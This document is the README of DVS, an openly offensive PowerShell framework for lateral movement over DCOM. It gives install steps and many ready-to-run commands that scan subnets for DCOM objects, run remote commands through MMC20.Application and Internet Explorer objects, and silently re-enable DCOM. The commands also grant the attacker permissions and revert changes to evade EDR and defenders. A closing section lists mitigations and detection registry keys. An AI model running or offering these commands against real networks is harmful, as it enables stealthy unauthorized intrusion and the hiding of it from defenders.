Did you ever wonder how you can move laterally through internal networks? or interact with remote machines without alerting EDRs?
Let’s assume that we have a valid credentials, or an active session with access to a remote machine, but we are without an option for executing a process remotely in a known, expected or a highly-monitored method (i.e. WMI, Task Scheduler, WinRM, PowerShell Remoting).
For these scenarios, the DVS framework comes to the rescue.
The DVS framework is a swiss army knife which allows you to enumerate vulnerable functions of remote DCOM objects, launch them and even launch attacks using them.
The framework is being developed with a “Red Team” mindset and uses stealth methods to compromise remote machines.
The DVS framework contains various ways to bypass remote hardening against DCOM by re-enableing DCOM access remotely and automatically grant the required permissions to the attacking user.
The framework can also revert changes on the remote machine to their original state, prior to the attack - hiding these changes from defenders.
Our main insight is that the tool can also execute commands using non-vulnerable DCOM objects through an aqsome technique (Read below about Invoke-RegisterRemoteSchema)
Compatible with PowerShell 2.0 and up
Disclaimer
This tool is for testing and educational purposes only. Any other usage for this code is not allowed. Use at your own risk.
The author bears NO responsibility for misuse of this tool.
By using this you accept the fact that any damage caused by the use of this tool is your responsibility.
Registry access - how the DVS framework utilizes that protocol
Registry access
AutoGrant
mode is flagged, check write permissions. otherwise, check read permissionsStandard Registry Provider (If remote-registry denied)
StdRegProv
is accessibleAutoGrant
mode is flagged, check for write permissions, otherwise, check for read permissionsWhy is this tool so stealthy?
The DVS tool first checks if principal-identity has access to the remote machine via the following steps:
Basic actions
SkipRegAuth
is not flagged)AutoGrant
flagged), otherwise failadsi/WindowsIdentity
feature), are granted to interact with the DCOM (via remote registry queries)AutoGrant
flagged), otherwise, failHKLM
or HKCU
Hives)Invoke-DCOMObjectScan
Get-ExecutionCommand
Invoke-ExecutionCommand
Invoke-RegisterRemoteSchema
Tool components
Author
License
Tested Scenarios
Tested Operating Systems
Credits
Installation:
git clone https://github.com/ScorpionesLabs/DVS
powershell -ep bypass
PS> Import-Module .\DVS.psm1
PS> Get-Help Invoke-DCOMObjectScan -Detailed # Get details of the Invoke-DCOMObjectScan command
PS> Get-Help Get-ExecutionCommand -Detailed # Get details of the Get-ExecutionCommand command
PS> Get-Help Invoke-ExecutionCommand -Detailed # Get details of the Invoke-ExecutionCommand command
Invoke-DCOMObjectScan
Invoke-DCOMObjectScan function allows you to scan DCOM objects and find vulnerable functions via a list of patterns or exact function names that you included in a file.
Examples:
Enumerates and Scan MMC20.Application
(ProgID) object from the attacker machine to the DC01
host without querying the registry.
Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -HostList DC01 -SkipRegAuth -Username "lab\administrator" -Password "Aa123456!" -Verbose
Note: The tool will not analyze ACL permissions, and when the tool will success, it will resolve all the information about the object, except the details mentioned on the registry(Like object name, executable file, etc.)
2. Check whether the `MMC20.Application` (ProgID) object is accessible from the attacker machine to the `DC01` host without first querying and verifying the access list of the DCOM object.
PS> Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -HostList DC01 -SkipPermissionChecks -CheckAccessOnly -Verbose
3. Validates whether the `MMC20.Application` (ProgID) is applicable through `10.211.55.4/24` range. If exists, he tool will try to enumerate the information about it. (using the current logged-on user session).
PS> Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -Hostlist "10.211.55.4/24" -CheckAccessOnly -Verbose
4. Validates if the `{00020812-0000-0000-C000-000000000046}` CLSID through `10.211.55.4` ip address object exists and accessible. If exists, the tool will resolve the information about it. (By using `lab\administrator` credentials).
PS> Invoke-DCOMObjectScan -Type Single -ObjectName "{00020812-0000-0000-C000-000000000046}" -Hostlist "10.211.55.4" -CheckAccessOnly -Username "lab\administrator" -Password "Aa123456!" -Verbose
5. Scans all the objects stored on a specified path (e.g. `C:\Users\USERNAME\Desktop\DVS\objects.txt`) through `10.211.55.4` ip address, and finds the function list located in the specified file like `vulnerable.txt` using the `lab\administrator` credentials with the _following configuration_:
Max depth: 4
Max results: 1 (1 result for each object)
AutoGrant mode: If we don’t have access to the object or if the DCOM feature is disabled, enable the DCOM feature and perform automatic grant to the relevant DCOM object.
Finally, revert the machine to the same state as before the attack.
PS> Invoke-DCOMObjectScan -MaxDepth 4 -Type List -ObjectListFile "C:\Users\USERNAME\Desktop\DVS\objects.txt" -FunctionListFile "C:\Users\USERNAME\Desktop\DVS\vulnerable.txt" -AutoGrant -Username "lab\administrator" -Password "Aa123456!" -Hostlist "10.211.55.4" -MaxResults 1 -Verbose
6. Scans all the objects stored on the available remote machines from the `10.211.55.1/24` range and finds potential vulnerable functions from the list located on the selected file (e.g. `C:\Users\USERNAME\Desktop\DVS\vulnerable.txt`).
PS> Invoke-DCOMObjectScan -MaxDepth 4 -Type All -FunctionListFile "C:\Users\USERNAME\Desktop\DVS\vulnerable.txt" -Hostlist "10.211.55.1/24" -Verbose
Get-ExecutionCommand
Get-ExecutionCommand function allows to generate a PowerShell payload that will interact and execute with the remote DCOM function with the relevant parameters.
Checks if the principal-identity is granted to interact with {00020812-0000-0000-C000-000000000046}
CLSID object through 10.211.55.4
ip address using lab\administrator
credentials, then it will generates the execution command.
PS> Get-ExecutionCommand -ObjectName "{00020812-0000-0000-C000-000000000046}" -ObjectPath "DDEInitiate" -HostList "10.211.55.4" -Username "lab\Administrator" -Password "Aa123456!" -Verbose
Checks for DCOM access,
In case the principal-identity doesn’t have the necessary permissions or the DCOM feature is disabled, the tool will enable the DCOM feature, grants identity access and interacts with MMC20.Application
(ProgID) object through 10.211.55.4
ip address using lab\administrator
credentials, and will generates you the execution command.
Finally, it will revert the machine to the same state as before the attack.
PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.4" -Username "lab\Administrator" -Password "Aa123456!" -AutoGrant -Verbose
Tries to interact with MMC20.Application
(ProgID) object through 10.211.55.1/24
range using current logged-on session without analyze ACL permissions then it will generates the execution command.
PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.1/24" -SkipPermissionChecks -Verbose
Tries to interact with MMC20.Application
(ProgID) object through 10.211.55.4
ip address, without querying the registry.
PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.4" -SkipRegAuth -Verbose
Invoke-ExecutionCommand
Invoke-ExecutionCommand function executes commands via DCOM Object using the logged-on user or provided credentials.
Examples:
Checks for DCOM access,
In case the principal-identity doesn’t have the necessary permissions or the DCOM feature is disabled, the tool will enable the DCOM feature, grant access, Interact with MMC20.Application
(ProgID) object through the range: 10.211.55.1/24
using current logged-on user session and Execute the following commands:
Executes cmd.exe /c calc
command
Set Frame.Top
attribute to 1
Finally, revert the machine to the same state as before the attack.
PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -AutoGrant -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")},@{ObjectPath="Frame.Top";Arguments=@(1)} ) -HostList "10.211.55.1/24" -Verbose
Tries to interact with MMC20.Application
(ProgID) object using lab\administrator
credentials through 10.211.55.4
ip address, and executes the following command: cmd.exe /c calc
.
PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")}) -HostList "10.211.55.4" -Username "lab\administrator" -Password "Aa123456!" -Verbose
Tries to interact with MMC20.Application
(ProgID) object using current logged-on user session without analyze ACL permissions, and executes the following command: cmd.exe /c calc
.
PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")}) -HostList "10.211.55.4" -SkipPermissionChecks -Verbose
Invoke-RegisterRemoteSchema
Invoke-RegisterRemoteSchema function executes commands via InternetExplorer.Application’s object using the logged-on user or provided credentials.
ShellBrowserWindow
ShellWindows
Internet Explorer
ielowutil.exe
Note: This object doesn’t need any access to local machine hive, it will proceed with the foothold with any user that can access the remote machine!
Examples:
Executes cmd /c calc
command on 10.211.55.1/24
range using the current logged-on session, and grant privileges if is needed
PS> Invoke-RegisterRemoteSchema -HostList "10.211.55.1/24" -Command "cmd /c calc" -AutoGrant -Verbose
Executes cmd /c calc
command on 10.211.55.4 remote machine using provided credentials
PS> Invoke-RegisterRemoteSchema -HostList "10.211.55.4" -Command "cmd /c calc" -Username "Administrator" -Password "Aa123456!" -Verbose
Future work
Mitigation and Recommendations
MITRE Technique: T1021.003 - Remote Services: Distributed Component Object Model
Prevention
Disable remote DCOM access
Disallow remote registry access if not required
Both options are hard to implement in an enterprise environment without an impact on availability. Nevertheless, it can be a good hardening option for endpoints that don’t need domain remote management. (e.g. standalone endpoints)
Enable Domain and Private Profiles in Windows Defender Firewall
Move to using LAPS in order to reduce the attack surface. If each computer in the domain has a different local administrator password, this account can’t be used for lateral movement.
Hardening user access rights can prevent this attack
By using Group Policy Objects an organization can remove administrators, users and other groups from the list, and move to using a special group/user for central management that does not interactivly log in to other computers
[Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Access this computer from the network]
In Official hardening guides like CIS the recommend setting of [Access this computer from the network] is with the values of “administrators andRemote Desktop UsersorAuthenticated users”. This recommendations are vulnerable to the DVS tool.
Harden the DCOM permissions by removing the rights of administrators from the permissions -Remote LaunchandRemote Activation.
Use a host-based firewall / application-aware firewall to block DCOM access between computers. Especially for a computer which is not part of the IT or management infrastructure.
Application control rules can be used as last circle of security controls to prevent vulnerable processes from spawning dangerous child processes or loading DLLs.
Examples:
mmc.exe -> cmd.exe
explorer.exe -> regsvr.exe
visio.exe -> wmic.exe
excel.exe -> Rundll32.exe
outlook.exe -> cmd.exe
Detection
Monitor changes on the registry in the following locations:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
This key is the DCOM permission settings. If they are changed it can mean that an adversary that used the DVS tool has removed the hardenning.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes]
“The subkeys and registry values associated with the [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] key contain information about an application that is needed to support COM functionality. This information includes such topics as supported data formats, compatibility information, programmatic identifiers, DCOM, and controls.” Microsoft dev center referense
[MACHINE\SOFTWARE\policies\Microsoft\windows NT\DCOM\MachineLaunchRestriction]
This key change may indicate that the DVS tool has disabled the DCOM remote activation andRemote Lauch restrictions.
Use an application aware firewall to block DCOM access between computers. Especially from a computer which is not part of the IT or management infrastructure.
Intrusion prevention system (e.g. Snort, Suricata) can be used to detect DCOM protocol which is based on RPC (MS-RPC, MS-RPCE) and Remote registry protocol (MS-RRP).
Monitor Windows Defender firewall by enabling audit log on blocked traffic for domain andprivate profiles.
Monitor changes to the following key. It may indicate that the DVS tool has created a rule to bypass the Microsoft Defender Firewall dynamic RPC restrictions.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
Monitor Windows event logs:
Enable audit of events. Audit settings that should be enabled on success and failure: Audit account logon events |Audit logon events|Audit object access|NTLM Auditing
Browse to this registry key: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole] Create new DWORDs with value of ‘1’ called ActivationFailureLoggingLevel |CallFailureLoggingLevel|InvalidSecurityDescriptorLoggingLevel